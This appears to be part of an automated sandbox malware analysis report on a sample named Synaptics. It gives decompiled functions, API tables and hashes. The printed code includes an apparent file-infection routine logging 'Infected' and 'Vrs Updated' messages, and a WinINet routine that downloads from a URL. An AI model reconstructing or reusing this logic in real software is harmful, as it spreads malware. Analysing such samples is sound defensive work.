				struct HINSTANCE__* _t113;
				struct HINSTANCE__* _t132;
				intOrPtr _t156;
				intOrPtr _t180;
				intOrPtr _t191;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t210;

				_t203 = __esi;
				_t202 = __edi;
				_t205 = _t206;
				_t156 = 7;
				do {
					_push(0);
					_push(0);
					_t156 = _t156 - 1;
				} while (_t156 != 0);
				_push(_t156);
				_t1 =  &_v8;
				 *_t1 = _t156;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v12);
				E00404E70(_v16);
				_push(_t205);
				_push(0x4778dd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t206;
				if( *((intOrPtr*)( *_v8 + 0x14))() - 1 < 0) {
					L13:
					_pop(_t180);
					 *[fs:eax] = _t180;
					_push(E004778E4);
					E004049E4( &_v68, 0xb);
					return E004049E4( &_v16, 2);
				}
				_t95 =  *((intOrPtr*)( *_v8 + 0x14))() - 1;
				if(_t95 < 0) {
					goto L13;
				}
				_t96 = _t95 + 1;
				_t210 = _t96;
				_v24 = _t96;
				_v20 = 0;
				do {
					 *((intOrPtr*)( *_v8 + 0xc))();
					if(E00409A48(_v28, _t210) != 0) {
						 *[fs:eax] = _t206;
						_t146 =  *_v8;
						 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x47789f, _t205);
						_t106 = LoadLibraryA(E00404E80(_v32)); // executed
						 *0x49ec78 = _t106;
						_t107 =  *0x49ec78; // 0x3fb0000, executed
						_t108 = E004770E4(_t107,  *_v8, _v16, _t202, _t203); // executed
						if(_t108 != 0) {
							_t109 =  *0x49ec78; // 0x3fb0000
							E0047717C(_t109, _t146,  &_v48, _v16, _t202, _t203);
							_t112 = E00409628(_v48, _t205, __eflags);
							__eflags = _t112 - _a8;
							if(_t112 >= _a8) {
								_t113 =  *0x49ec78; // 0x3fb0000
								FreeLibrary(_t113); // executed
								 *((intOrPtr*)( *_v8 + 0xc))();
								E00404CCC( &_v64, _v68, "Infected Canceled -> ");
								 *((intOrPtr*)( *_v8 + 0x20))();
							} else {
								 *((intOrPtr*)( *_v8 + 0xc))();
								E004774A8(_v52,  *_v8, _v12, _t202, _t203, 1);
								 *((intOrPtr*)( *_v8 + 0xc))();
								E00404CCC( &_v56, _v60, "Vrs Updated -> ");
								 *((intOrPtr*)( *_v8 + 0x20))();
							}
						} else {
							_t132 =  *0x49ec78; // 0x3fb0000
							FreeLibrary(_t132);
							 *((intOrPtr*)( *_v8 + 0xc))();
							E004774A8(_v36,  *_v8, _v12, _t202, _t203, 0);
							 *((intOrPtr*)( *_v8 + 0xc))();
							E00404CCC( &_v40, _v44, "Completed -> ");
							 *((intOrPtr*)( *_v8 + 0x20))();
						}
						_pop(_t191);
						 *[fs:eax] = _t191;
					}
					_v20 = _v20 + 1;
					_t75 =  &_v24;
					 *_t75 = _v24 - 1;
				} while ( *_t75 != 0);
				goto L13;
			}



































                                                                                                                                                                                          0x004776d4
                                                                                                                                                                                          0x004776d4
                                                                                                                                                                                          0x004776d5
                                                                                                                                                                                          0x004776d8
                                                                                                                                                                                          0x004776dd
                                                                                                                                                                                          0x004776dd
                                                                                                                                                                                          0x004776df
                                                                                                                                                                                          0x004776e1
                                                                                                                                                                                          0x004776e1
                                                                                                                                                                                          0x004776e4
                                                                                                                                                                                          0x004776e5
                                                                                                                                                                                          0x004776e5
                                                                                                                                                                                          0x004776e8
                                                                                                                                                                                          0x004776e9
                                                                                                                                                                                          0x004776ea
                                                                                                                                                                                          0x004776eb
                                                                                                                                                                                          0x004776ee
                                                                                                                                                                                          0x004776f1
                                                                                                                                                                                          0x004776f7
                                                                                                                                                                                          0x004776ff
                                                                                                                                                                                          0x00477706
                                                                                                                                                                                          0x00477707
                                                                                                                                                                                          0x0047770c
                                                                                                                                                                                          0x0047770f
                                                                                                                                                                                          0x0047771b
                                                                                                                                                                                          0x004778b5
                                                                                                                                                                                          0x004778b7
                                                                                                                                                                                          0x004778ba
                                                                                                                                                                                          0x004778bd
                                                                                                                                                                                          0x004778ca
                                                                                                                                                                                          0x004778dc
                                                                                                                                                                                          0x004778dc
                                                                                                                                                                                          0x00477729
                                                                                                                                                                                          0x0047772c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00477732
                                                                                                                                                                                          0x00477732
                                                                                                                                                                                          0x00477733
                                                                                                                                                                                          0x00477736
                                                                                                                                                                                          0x0047773d
                                                                                                                                                                                          0x00477748
                                                                                                                                                                                          0x00477755
                                                                                                                                                                                          0x00477766
                                                                                                                                                                                          0x00477772
                                                                                                                                                                                          0x00477774
                                                                                                                                                                                          0x00477780
                                                                                                                                                                                          0x00477785
                                                                                                                                                                                          0x0047778d
                                                                                                                                                                                          0x00477792
                                                                                                                                                                                          0x00477799
                                                                                                                                                                                          0x004777fb
                                                                                                                                                                                          0x00477800
                                                                                                                                                                                          0x00477808
                                                                                                                                                                                          0x0047780d
                                                                                                                                                                                          0x00477810
                                                                                                                                                                                          0x0047785e
                                                                                                                                                                                          0x00477864
                                                                                                                                                                                          0x00477874
                                                                                                                                                                                          0x00477882
                                                                                                                                                                                          0x00477892
                                                                                                                                                                                          0x00477812
                                                                                                                                                                                          0x0047781f
                                                                                                                                                                                          0x0047782b
                                                                                                                                                                                          0x0047783b
                                                                                                                                                                                          0x00477849
                                                                                                                                                                                          0x00477859
                                                                                                                                                                                          0x00477859
                                                                                                                                                                                          0x0047779b
                                                                                                                                                                                          0x0047779b
                                                                                                                                                                                          0x004777a1
                                                                                                                                                                                          0x004777b3
                                                                                                                                                                                          0x004777bf
                                                                                                                                                                                          0x004777cf
                                                                                                                                                                                          0x004777dd
                                                                                                                                                                                          0x004777ed
                                                                                                                                                                                          0x004777ed
                                                                                                                                                                                          0x00477897
                                                                                                                                                                                          0x0047789a
                                                                                                                                                                                          0x0047789a
                                                                                                                                                                                          0x004778a9
                                                                                                                                                                                          0x004778ac
                                                                                                                                                                                          0x004778ac
                                                                                                                                                                                          0x004778ac
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,?,?,?,?,00000000,00000006,00000000,00000000,004967CC,?,00498487,00000001,0000006A,?,00000000), ref: 00477780
                                                                                                                                                                                          • FreeLibrary.KERNEL32(03FB0000,00000000,?,?,?,?,00000000,00000006,00000000,00000000,004967CC,?,00498487,00000001,0000006A), ref: 004777A1
                                                                                                                                                                                          • FreeLibrary.KERNEL32(03FB0000,00000000,?,?,?,?,00000000,00000006,00000000,00000000,004967CC,?,00498487,00000001,0000006A), ref: 00477864
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$Free$Load
                                                                                                                                                                                          • String ID: Completed -> $Infected Canceled -> $Vrs Updated ->
                                                                                                                                                                                          • API String ID: 2391024519-3592865843
                                                                                                                                                                                          • Opcode ID: 52484c96bb6ab29c88ddacf3b8cb425d3eeb075117684dd8c883d8223fab11a5
                                                                                                                                                                                          • Instruction ID: 17185f43945d3bc0c2e5cc5bb4bd267fdef97e65ffff577caacc568d39ef9c26
                                                                                                                                                                                          • Opcode Fuzzy Hash: 52484c96bb6ab29c88ddacf3b8cb425d3eeb075117684dd8c883d8223fab11a5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 32611878A04209DFDB04EFA5C8849EEB7B5FF48300F6180A6E904A7351CB34AE05CF65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004587A4 Relevance: 10.6, APIs: 7, Instructions: 89COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E004587A4(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				int _t27;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
				if( *0x49ebb8 != 0) {
					_t54 =  *0x49ebb8; // 0x22b1714
					_t2 = _t54 + 0x88; // 0x1
					_v5 =  *_t2;
				}
				_push(_t74);
				_push(0x4588e9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x49ebb8 != 0) {
					_t52 =  *0x49ebb8; // 0x22b1714
					E0045AD24(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E00424FCC( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65); // executed
					_t6 = _t57 + 0x84; // 0x38004010
					E00424FCC( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
				if(_t27 == 0) {
					_t14 = _t57 + 0x80; // 0x94000000
					E004250B0( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E00424FCC( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0x94000000
					E00424FCC( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E00424FCC( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0x94000000
				E00424E10( *_t16, 0xff000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E00424E10( *_t17, 0xff000007);
				 *[fs:eax] = 0xff000007;
				_push(0x4588f0);
				if( *0x49ebb8 != 0) {
					_t38 =  *0x49ebb8; // 0x22b1714
					return E0045AD24(_t38, _v5);
				}
				return 0;
			}






















                                                                                                                                                                                          0x004587a4
                                                                                                                                                                                          0x004587a5
                                                                                                                                                                                          0x004587a7
                                                                                                                                                                                          0x004587ae
                                                                                                                                                                                          0x004587b0
                                                                                                                                                                                          0x004587bb
                                                                                                                                                                                          0x004587bd
                                                                                                                                                                                          0x004587c2
                                                                                                                                                                                          0x004587c8
                                                                                                                                                                                          0x004587c8
                                                                                                                                                                                          0x004587cd
                                                                                                                                                                                          0x004587ce
                                                                                                                                                                                          0x004587d3
                                                                                                                                                                                          0x004587d6
                                                                                                                                                                                          0x004587e0
                                                                                                                                                                                          0x004587e4
                                                                                                                                                                                          0x004587e9
                                                                                                                                                                                          0x004587e9
                                                                                                                                                                                          0x004587ff
                                                                                                                                                                                          0x0045881b
                                                                                                                                                                                          0x00458822
                                                                                                                                                                                          0x00458828
                                                                                                                                                                                          0x00458801
                                                                                                                                                                                          0x00458805
                                                                                                                                                                                          0x0045880c
                                                                                                                                                                                          0x00458812
                                                                                                                                                                                          0x00458812
                                                                                                                                                                                          0x0045882d
                                                                                                                                                                                          0x00458844
                                                                                                                                                                                          0x0045884b
                                                                                                                                                                                          0x00458881
                                                                                                                                                                                          0x0045888c
                                                                                                                                                                                          0x00458893
                                                                                                                                                                                          0x0045889a
                                                                                                                                                                                          0x004588a0
                                                                                                                                                                                          0x0045884d
                                                                                                                                                                                          0x00458854
                                                                                                                                                                                          0x0045885b
                                                                                                                                                                                          0x00458861
                                                                                                                                                                                          0x0045886d
                                                                                                                                                                                          0x00458874
                                                                                                                                                                                          0x0045887a
                                                                                                                                                                                          0x0045887a
                                                                                                                                                                                          0x004588a5
                                                                                                                                                                                          0x004588b0
                                                                                                                                                                                          0x004588b5
                                                                                                                                                                                          0x004588c0
                                                                                                                                                                                          0x004588ca
                                                                                                                                                                                          0x004588cd
                                                                                                                                                                                          0x004588d9
                                                                                                                                                                                          0x004588de
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004588e3
                                                                                                                                                                                          0x004588e8

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004587F8
                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00458805
                                                                                                                                                                                          • GetStockObject.GDI32(0000000D), ref: 0045881B
                                                                                                                                                                                            • Part of subcall function 004250B0: MulDiv.KERNEL32(00000000,?,00000048), ref: 004250BD
                                                                                                                                                                                          • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00458844
                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00458854
                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 0045886D
                                                                                                                                                                                          • GetStockObject.GDI32(0000000D), ref: 00458893
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2891467149-0
                                                                                                                                                                                          • Opcode ID: 1d318198154b46cf8f2b40026440cf65ed92ca40f81abb2fb166fbe13c1f9689
                                                                                                                                                                                          • Instruction ID: c8c9ae32e1ca622756d665ee7f261621c5687007f21876862268219cdbc985ab
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d318198154b46cf8f2b40026440cf65ed92ca40f81abb2fb166fbe13c1f9689
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E318330B042449FE750FBA9DC42B9973A4EB44305F9440BABD08EB2D7DE78A949C729
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00474FC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89networkfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 61%
                                                                                                                                                                                          			E00474FC0(void* __eax, void* __ebx, void* __edx, void* __esi) {
				void* _v8;
				void* _v12;
				long _v16;
				void _v1042;
				char _v1048;
				void* _t32;
				int _t40;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t60;
				void* _t62;
				void* _t63;
				intOrPtr _t64;

				_t62 = _t63;
				_t64 = _t63 + 0xfffffbec;
				_v1048 = 0;
				_t47 = __edx;
				_t60 = __eax;
				_push(_t62);
				_push(0x4750fb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t64;
				E004049C0(__edx);
				_v8 = InternetOpenA("MyApp", 0, 0, 0, 0);
				_push(_t62);
				_push(0x4750db);
				_push( *[fs:eax]);
				 *[fs:eax] = _t64;
				if(_v8 == 0) {
					L6:
					_pop(_t55);
					 *[fs:eax] = _t55;
					_push(E004750E2);
					return InternetCloseHandle(_v8);
				} else {
					_t32 = InternetOpenUrlA(_v8, E00404E80(_t60), 0, 0, 0x84000000, 0); // executed
					_v12 = _t32;
					if(_v12 == 0) {
						goto L6;
					} else {
						_push(_t62);
						_push(0x4750bd);
						_push( *[fs:eax]);
						 *[fs:eax] = _t64;
						while(1) {
							_v16 = 0x400;
							InternetReadFile(_v12,  &_v1042, 0x400,  &_v16); // executed
							if(_v16 == 0) {
								break;
							}
							 *((char*)(_t62 + _v16 - 0x40e)) = 0;
							E00404C30( &_v1048, 0x402,  &_v1042);
							E00404C88(_t47, _v1048);
						}
						_pop(_t56);
						 *[fs:eax] = _t56;
						_push(E004750C4);
						_t40 = InternetCloseHandle(_v12); // executed
						return _t40;
					}
				}
			}

















                                                                                                                                                                                          0x00474fc1
                                                                                                                                                                                          0x00474fc3
                                                                                                                                                                                          0x00474fcd
                                                                                                                                                                                          0x00474fd3
                                                                                                                                                                                          0x00474fd5
                                                                                                                                                                                          0x00474fd9
                                                                                                                                                                                          0x00474fda
                                                                                                                                                                                          0x00474fdf
                                                                                                                                                                                          0x00474fe2
                                                                                                                                                                                          0x00474fe7
                                                                                                                                                                                          0x00474ffe
                                                                                                                                                                                          0x00475003
                                                                                                                                                                                          0x00475004
                                                                                                                                                                                          0x00475009
                                                                                                                                                                                          0x0047500c
                                                                                                                                                                                          0x00475013
                                                                                                                                                                                          0x004750c4
                                                                                                                                                                                          0x004750c6
                                                                                                                                                                                          0x004750c9
                                                                                                                                                                                          0x004750cc
                                                                                                                                                                                          0x004750da
                                                                                                                                                                                          0x00475019
                                                                                                                                                                                          0x00475030
                                                                                                                                                                                          0x00475035
                                                                                                                                                                                          0x0047503c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00475042
                                                                                                                                                                                          0x00475044
                                                                                                                                                                                          0x00475045
                                                                                                                                                                                          0x0047504a
                                                                                                                                                                                          0x0047504d
                                                                                                                                                                                          0x00475050
                                                                                                                                                                                          0x00475050
                                                                                                                                                                                          0x0047506b
                                                                                                                                                                                          0x00475074
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00475079
                                                                                                                                                                                          0x00475092
                                                                                                                                                                                          0x0047509f
                                                                                                                                                                                          0x0047509f
                                                                                                                                                                                          0x004750a8
                                                                                                                                                                                          0x004750ab
                                                                                                                                                                                          0x004750ae
                                                                                                                                                                                          0x004750b7
                                                                                                                                                                                          0x004750bc
                                                                                                                                                                                          0x004750bc
                                                                                                                                                                                          0x0047503c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InternetOpenA.WININET(MyApp,00000000,00000000,00000000,00000000), ref: 00474FF9
                                                                                                                                                                                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00475030
                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000400,00000400), ref: 0047506B
                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 004750B7
                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 004750D5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                                          • String ID: MyApp
                                                                                                                                                                                          • API String ID: 3121278467-2115267534
                                                                                                                                                                                          • Opcode ID: afa14cc7e2eab5324324de8681b23ebe67fc229f7eef67d3fb76cd8180e839bd
                                                                                                                                                                                          • Instruction ID: 49772c5e95778878b0e4af45138c7482376825189897ce4c7807679e07b59e25
                                                                                                                                                                                          • Opcode Fuzzy Hash: afa14cc7e2eab5324324de8681b23ebe67fc229f7eef67d3fb76cd8180e839bd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C31A7B1A04748ABE711DBA5DC12BDA77BCE748704F6184BAB704E76C0D6BC5940CA5C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00422C88 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                          			E00422C88(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				struct HWND__* _t15;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;
				CHAR* _t24;

				_t6 =  *0x49e668; // 0x400000
				 *0x49b5dc = _t6;
				_t8 =  *0x49b5f0; // 0x422c78
				_t9 =  *0x49e668; // 0x400000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L00407540 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x49e668; // 0x400000
						_t20 =  *0x49b5f0; // 0x422c78
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x49b5cc);
				}
				_t13 =  *0x49e668; // 0x400000
				_t24 =  *0x49b5f0; // 0x422c78
				_t15 = E00407A8C(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000); // executed
				_t22 = _t15;
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E00422BCC(_a4, _a8));
				}
				return _t22;
			}















                                                                                                                                                                                          0x00422c8f
                                                                                                                                                                                          0x00422c94
                                                                                                                                                                                          0x00422c9d
                                                                                                                                                                                          0x00422ca3
                                                                                                                                                                                          0x00422ca9
                                                                                                                                                                                          0x00422cb1
                                                                                                                                                                                          0x00422cb3
                                                                                                                                                                                          0x00422cb6
                                                                                                                                                                                          0x00422cc4
                                                                                                                                                                                          0x00422cc6
                                                                                                                                                                                          0x00422ccc
                                                                                                                                                                                          0x00422cd2
                                                                                                                                                                                          0x00422cd2
                                                                                                                                                                                          0x00422cdc
                                                                                                                                                                                          0x00422cdc
                                                                                                                                                                                          0x00422cf2
                                                                                                                                                                                          0x00422cff
                                                                                                                                                                                          0x00422d0a
                                                                                                                                                                                          0x00422d0f
                                                                                                                                                                                          0x00422d16
                                                                                                                                                                                          0x00422d27
                                                                                                                                                                                          0x00422d27
                                                                                                                                                                                          0x00422d32

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                                                                                                          • String ID: TPUtilWindow$x,B
                                                                                                                                                                                          • API String ID: 4025006896-1057714546
                                                                                                                                                                                          • Opcode ID: cebccb0ec9a9405ea43d2313997cbfa4afe76ef610b176b8fc2697447ba8c785
                                                                                                                                                                                          • Instruction ID: 5edbcaf682720338496e3359f8b598ec737c219f81609156ea6670bddb9c1a51
                                                                                                                                                                                          • Opcode Fuzzy Hash: cebccb0ec9a9405ea43d2313997cbfa4afe76ef610b176b8fc2697447ba8c785
                                                                                                                                                                                          • Instruction Fuzzy Hash: E0018E71744204BBDB00EB6AED81F9A7399EB28718F544137F904E73A1D679AC40CBAD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00437D70 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00437D70(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x49bc20; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x49bc20; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x49bc20; // 0x0
				SetPropA(_a4,  *0x49eb26 & 0x0000ffff, _t27);
				_t31 =  *0x49bc20; // 0x0
				SetPropA(_a4,  *0x49eb24 & 0x0000ffff, _t31);
				_t35 =  *0x49bc20; // 0x0
				 *0x49bc20 = 0; // executed
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}










                                                                                                                                                                                          0x00437d75
                                                                                                                                                                                          0x00437d78
                                                                                                                                                                                          0x00437d80
                                                                                                                                                                                          0x00437d86
                                                                                                                                                                                          0x00437d98
                                                                                                                                                                                          0x00437dad
                                                                                                                                                                                          0x00437dc8
                                                                                                                                                                                          0x00437dc8
                                                                                                                                                                                          0x00437dcd
                                                                                                                                                                                          0x00437ddf
                                                                                                                                                                                          0x00437de4
                                                                                                                                                                                          0x00437df6
                                                                                                                                                                                          0x00437e07
                                                                                                                                                                                          0x00437e0c
                                                                                                                                                                                          0x00437e1c
                                                                                                                                                                                          0x00437e24

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetWindowLongA.USER32 ref: 00437D98
                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 00437DA3
                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 00437DB5
                                                                                                                                                                                          • SetWindowLongA.USER32 ref: 00437DC8
                                                                                                                                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 00437DDF
                                                                                                                                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 00437DF6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LongWindow$Prop
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3887896539-0
                                                                                                                                                                                          • Opcode ID: 51d6e6583fdfce383e099e89a982cca909cf1dddc6894a580fa6964d4a767a4a
                                                                                                                                                                                          • Instruction ID: b5f16ed505960de4fc23b1fb6768328cc78d5017c86fd9e1eb6bf423726d3339
                                                                                                                                                                                          • Opcode Fuzzy Hash: 51d6e6583fdfce383e099e89a982cca909cf1dddc6894a580fa6964d4a767a4a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0111CCB5504208BFDB10DF9DDD84EAA37E8EB1C354F10462AF914DB2A1DB34E9409BA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00457FC8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                          			E00457FC8(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr _t42;
				intOrPtr* _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t62;
				void* _t63;
				char _t64;
				void* _t74;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				_t74 = __edi;
				_t64 = __edx;
